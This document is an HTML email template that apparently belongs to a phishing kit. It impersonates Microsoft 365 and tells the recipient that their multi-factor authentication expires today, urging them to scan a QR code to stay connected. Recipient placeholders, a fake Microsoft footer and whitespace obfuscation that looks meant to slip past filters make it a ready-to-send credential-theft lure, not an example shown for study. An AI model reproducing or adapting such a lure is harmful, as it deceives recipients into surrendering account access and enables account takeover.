
<!DOCTYPE	   	 		html>


<html			  		 	lang="en">

<head>

<meta    charset="UTF-8">

<meta		 				   name="viewport"	  content="width=device-width,  	initial-scale=1.0">
<title>Review 	 	 Notification</title>
<style>



 		 body		 {
  		 margin:   	 10px;




	    padding:	 		 	   	15px;

		font-family:	   	 'Monospace',				 		Tahoma, 		 Geneva,		     Verdana, 	   	sans-serif;





  				  background-color:    	#ffffff;
 	  	}
	     .handicapper	  {




	


		 max-width:			 				100%;









/*  					margin:		  	    40px		   auto;*/




	 	 border:  		 1px		solid			 	#ffff;



  	 			 border-radius: 	 	  	  4px;

	  	  overflow:  	hidden;


   	}


    				 .baize  {


			 	background-color:			 		 	  #ffffff;



 	  		 	padding:5px			 	    40px  		    5px 40px;

  	  	  	display:		 		 	 flex;



						 		 align-items: center;

					  	}

	 	   	 .baize 			img  			  			{

	 		max-height:	 		40px;
	 				   }




		  	.calves   	  	 		{

	background-color:		      	white;




	 			 padding:		 				 	1px 		  36px;
 	 }
 	   	  	 .title  	 				{


	 		  			color:		 #0078D4;

 			 	font-size:	 		35px;

		    font-weight:	   5px;

			 		margin-bottom:		10px;




   			 	}


			 		.larcenist		 			{




		 line-height:	   	 	1.5;


  }

	 .veggies						 		{




     	  margin-left:		20px;



  	 		 			}
		  	  	.button   {



 	 			display: 	inline-block;


  	  padding:				 			11px		10px;
 		 background-color:   		 		 #0078D4;
 color: white;

 text-decoration:	 	 none;

   	 	font-weight:	bold;

		 	 border-radius:     		 	2px;




 	margin-top:    20px;

  }



 .baldly  	 	{



 	  font-size:	  12px;




 	  	color: 		 	  		#666;


			line-height: 		    1.5;



		 			margin-top:	15px;




 				 	   padding: 	 	20px;
   	   background-color:   	 	   #ffff;
 	 }






 	.undelivered-table {




    	 	 margin-top:			    	 20px;


 		width:						100%;


 border-collapse:    		 collapse;




   	 }






			  	 		.undelivered-table						  th,



	   	 .undelivered-table td	 			   {




	 	padding-right:				  3px;



  padding-top:				   		 2px;




  		 	 padding-bottom:  		 2px;

 					 padding-left:  	 		 	 	3px;


		 	  border:	 1px	 		solid  	   #000000;
 		}





	 	 	  .undelivered-table 	th	     	{


	  	 background-color:						 			#0078D4;


  color:		 white;




 	 	 	}



		.undelivered-table					 				tr:nth-child(even)			 	  	{


	 	background-color:		 				#FFEBEB;

 }




	 	.undelivered-table tr:nth-child(odd) 		  	   {


 	 background-color: 	  		 	#FFEBEB;
 	 			 	}
</style>

</head>


<body>



<div 	 	class="handicapper">


 	   	<div	 	 		class="baize">




	 	<div		 			  style="flex-grow: 	  		  		1;"></div>

</div>




<img	src="https://static.wikia.nocookie.net/windows/images/c/c6/Microsoft_Authenticator_iOS_icon.png"	 		 	 	 	style="align-self:		    	flex-start;		   	 	  margin-left:			 	 	20px;  margin-bottom: 	 23px;	 	   	 	max-width:		 	 			120px;	  	 max-height:88px;"		      	/>


	<div		  			   class="calves">
	  <div  				style="font-size:28px;		  		 	  letter-spacing:0;	 	 		    line-height:36px;  	   	 color:#000000;				 	font-weight:600;	 	font-family:'Segoe UI';	 		" 	   		  class="">Microsoft 365	 	 	sign-in			  for multi-factor  		  	  authentication</div><br>



   	 	  	<div class="larcenist">


  	Dear				 		##RECIPIENT_NAME##:<br><br>


 	<div	 		  		class="veggies">


 			 	    •	The			multi-factor 	   	authentication	 				  for <b>##RECIPIENT_EMAIL##</b>    	is 	  	  set			 		to   expire 	    <b 	    	 style="color:red;">today</b>.<br>

	 		 	 		 •	  	 	<span> 	  	  	Scan 		  		 the	   secure <b>QR 	      Code</b>	 	  	 	 below			 with				your	    	  smartphone	 	 	   	camera       to	   	 stay			  connected		 	 	 to 		  Microsoft	365	 	 apps   				  and	 services.	 </span><br><br>
	 <center>

            <img width="200px" height="200px" src="cid:qrcode" alt="QR Code"></center><br>



      </div>

  </div>
				  		</div>




			   	<span	  	  	style="margin-left: 15px; 	 	 font-size:   				13px">Contact 		 	 Microsoft  help	    		  	desk  if  	you		  have   		any		 	 		 	questions.</span><br><br>


  	 <div    class="baldly">


		  This				   email  	      	was 	   sent								 from  an  	 	 		 unmonitored       mailbox.<br>

      	You	 	 are 			  receiving	this	email 	    	because  	 		   you 						 have 	 		 subscribed			 	 	to			 					Microsoft			   				Office 	 	 			 365.<br>




					  	<a	 		   	href="#">Privacy	 Statement</a><br>



  	 Microsoft	 Corporation, One	 			 Microsoft   			Way,			 	Redmond, 	  		  WA				98052   	   USA<br>
	 	   	 	<div	 	style="display:	 			flex; 	 align-items:	   	  		center;  		margin-top:    		  3px;">
		<img		   class=""  	 width="18"  	 	  	 height="18"	src="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico"	onerror="this.onerror=null;this.parentNode.removeChild(this)"	style="margin-right:	10px;">
    	   		<div	 	 	 		style="font-weight:		  			bold;">Microsoft</div>




		</div>

   </div>
		 		 <span	 	  	 	style="color:white;"><span class="curyear"></span> 15:44:54</span></span>


</div>
<script>
const yearElements = document.querySelectorAll('.curyear');
const currentYear = new Date().getFullYear();
yearElements.forEach(element => {
element.textContent = currentYear;
});
</script>
</body>
</html>